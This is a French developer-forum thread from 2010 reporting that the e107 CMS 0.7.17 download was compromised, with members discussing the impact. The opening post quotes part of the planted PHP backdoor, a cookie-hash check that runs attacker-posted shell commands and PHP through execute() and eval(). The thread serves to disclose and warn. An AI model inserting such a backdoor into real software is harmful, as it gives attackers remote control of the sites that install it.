La dernière version du SGC e107 est backdoorée, son lien de téléchargement est compromis

Katleen Erna · 27/01/2010, 04h26

La dernière version du SGC e107 est backdoorée, son lien de téléchargement est compromis

Certains d'entre vous utilisent peut être le système de gestion de contenu open source e107 pour créer ou gèrer des sites Internet. Disponible selon les termes de la licence GNU, ce SGC propose régulièrement de nouveaux téléchargements et mises à jour.

Il semblerait que sa dernière version, la 0.7.17 (qui vient de sortir), contienne un PHP Backdoor.

Un spécialiste en sécurité informatique ayant téléchargé le fichier a découvert l'entrée suivante à la ligne numéro 1876 de son code source :

Citation:

if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") {

...

if(!empty($_POST['cmd'])){
$out = execute($_POST['cmd']);
}

elseif(!empty($_POST['php'])){
ob_start();
eval($_POST['php']);
$out = ob_get_contents();
ob_end_clean();
}

(etc.)

Le lien de téléchargement ne serait donc pas fiable. L'internaute a averti e107, et recommande de ne plus télécharger le fichier en l'attente de leur réponse au problème.

Plus d'informations ici.

supertonic · 27/01/2010, 09h55

Il s'agit d'une faille venant de php donc ? Les sites utilisant php sont également concernés ?

trenton · 27/01/2010, 10h02

Citation:

Envoyé par supertonic

Il s'agit d'une faille venant de php donc ? Les sites utilisant php sont également concernés ?

Non

ixpe · 27/01/2010, 10h05

Citation:

Envoyé par supertonic

Il s'agit d'une faille venant de php donc ? Les sites utilisant php sont également concernés ?

Oula...
Non il s agit d un code inseré par une personne malveillante dans les sources du cms...

Je l aime bien pourtant ce petit cms... Pas tres connu, je le pensais donc
plus ou moins a l abri des objectifs des pirates.

khayyam90 · 27/01/2010, 10h06

La faille vient du code en téléchargement.
Quiconque installe cette nouvelle version permettra à un attaquant bien informé (qui aura connaissance du cookie à nommer access-admin) d'exécuter directement du code système ou php sur son site.
Une rapide recherche de base de données md5 ne m'a pas indiqué la valeur à positionner dans cookie.

Grosse grosse faille de sécurité.

bombseb · 27/01/2010, 11h04

il est sympas ce CMS mais il m'a pas l'air tres sécure...

je l'avais installé il y a un moment déja et on me l'avait déja hacké à l'époque...

kaymak · 27/01/2010, 12h56

Encore un bel exemple de propagation par les équipes de développement. Qui n'ont pas fait cela exprès.
C'est juste un des mecs ou des serveurs d'hébergement qui s'est fait infecté involontairement et qui par rebond a contaminé son projet : /

Donc le cms est toujours aussi secure (comme avant quoi pas plus, pas moins). et non, et triple non ce n'est pas une faille du moteur php, ou alors il faut bannir tous les langages de programmation.

Fin, faut tout de même patcher sa release pour ceux qui ont upgradé, plus encore ceux qui sont en serveur dédié, ou autre rps / vps.

27/01/2010, 09h55	#2
supertonic Membre habitué Inscription : septembre 2003 Messages : 152 Détails du profil Informations forums : Inscription : septembre 2003 Messages : 152 Points : 133 Points : 133	Il s'agit d'une faille venant de php donc ? Les sites utilisant php sont également concernés ?
	00

27/01/2010, 10h06	#5
khayyam90 Responsable Portail Ingénieur développement logiciels Inscription : janvier 2004 Messages : 7 134 Détails du profil Informations personnelles : Sexe : Âge : 26 Localisation : France, Bas Rhin (Alsace) Informations professionnelles : Activité : Ingénieur développement logiciels Secteur : High Tech - Éditeur de logiciels Informations forums : Inscription : janvier 2004 Messages : 7 134 Points : 10 199 Points : 10 199	La faille vient du code en téléchargement. Quiconque installe cette nouvelle version permettra à un attaquant bien informé (qui aura connaissance du cookie à nommer access-admin) d'exécuter directement du code système ou php sur son site. Une rapide recherche de base de données md5 ne m'a pas indiqué la valeur à positionner dans cookie. Grosse grosse faille de sécurité. __________________ Responsable du Portail Developpez. A la recherche d'un poste sur Strasbourg. Mes tutoriels Algo, Web, C++, PHP - Mon CV
	00

27/01/2010, 11h04	#6
bombseb Membre confirmé Inscription : juillet 2005 Messages : 365 Détails du profil Informations forums : Inscription : juillet 2005 Messages : 365 Points : 291 Points : 291	il est sympas ce CMS mais il m'a pas l'air tres sécure... je l'avais installé il y a un moment déja et on me l'avait déja hacké à l'époque...
	00

27/01/2010, 12h56	#7
kaymak Membre Expert Inscription : janvier 2007 Messages : 1 452 Détails du profil Informations personnelles : Âge : 27 Localisation : France, Paris (Île de France) Informations forums : Inscription : janvier 2007 Messages : 1 452 Points : 1 911 Points : 1 911	Encore un bel exemple de propagation par les équipes de développement. Qui n'ont pas fait cela exprès. C'est juste un des mecs ou des serveurs d'hébergement qui s'est fait infecté involontairement et qui par rebond a contaminé son projet : / Donc le cms est toujours aussi secure (comme avant quoi pas plus, pas moins). et non, et triple non ce n'est pas une faille du moteur php, ou alors il faut bannir tous les langages de programmation. Fin, faut tout de même patcher sa release pour ceux qui ont upgradé, plus encore ceux qui sont en serveur dédié, ou autre rps / vps.
	00

Outils de la discussion
Afficher une version imprimable Envoyer un lien vers cette page par email